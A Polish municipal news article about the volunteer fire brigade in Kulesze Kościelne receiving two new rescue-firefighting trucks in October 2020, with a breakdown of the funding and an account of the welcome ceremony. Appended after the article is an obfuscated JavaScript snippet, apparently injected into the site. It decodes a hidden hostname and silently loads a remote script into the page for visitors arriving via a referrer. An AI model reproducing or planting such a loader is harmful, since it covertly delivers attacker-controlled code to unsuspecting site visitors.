Aktualności

Dwa nowe samochody ratowniczo- gaśnicze w Gminie Kulesze Kościelne!

paź 29, 2020 | Aktualności

23 października 2020 roku Ochotnicza Straż Pożarna w Kuleszach Kościelnych

odebrała  dwa nowe samochody ratowniczo- gaśnicze od firmy Stolarczyk z Kielc.

Jeden z samochodów bojowych jest nagrodą za najwyższą frekwencję wyborczą

w tzw. „Bitwie o wozy”,

drugi wóz został zakupiony przez gminę z dofinansowania

Ministerstwa Spraw Wewnętrznych i Administracji i Funduszu Sprawiedliwości.

Pierwszy samochód ratowniczo- gaśniczy Renualt został dofinansowany z:

Komendy Głównej Państwowej Straży Pożarnej – 400 000,00 zł,

Ministerstwo Spraw Wewnętrznych i Administracji – 400 000,00 zł

kwota z Gminy Kulesz Kościelnych to jedynie  – 3 682,00 zł

Drugi samochód ratowniczo-gaśniczy  MAN został dofinansowany z:

Komendy Głównej Państwowej Straży Pożarnej – 180 000,00 zł,

Ministerstwo Spraw Wewnętrznych i Administracji – 380 000,00 zł

Fundusz Sprawiedliwości – 122 265,00 zł,

Gmina Kulesze Kościelne  – 192 874,99 zł – ( 20 000 zł dotacja Urzędu Marszałkowskiego)

Późnym popołudniem w piątek pojazdy ,,Renia’’ i ,,Maniek’’

pojawiły się  w Kuleszach Kościelnych.

Przy powitaniu nowych wozów strażackich towarzyszyły wszystkie sygnały strażackie.

Jednostka Ochotniczej Straży Pożarnej przywitała dwa nadjeżdżające wozy

z zapalonymi racami w dłoniach.

Mieszkańcy z wielką dumą obserwowali nadjeżdżające wozy,

które poświęcił  Ks. Proboszcz Krzysztof Konopka.  

Wójt Gminy Stefan Grodzki podziękował wszystkim za zaangażowanie

oraz pomoc w organizacji uroczystości a w szczególności:

Poseł Aleksandrze Szczudło za pomoc w pozyskaniu środków z Funduszu Sprawiedliwości,

Komendantowi Powiatowemu PSP Adamowi Frankowskiemu za pomoc

w pozyskaniu środków na zakup samochodów

oraz  przyjaciołom OSP Kulesze Kościelne.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);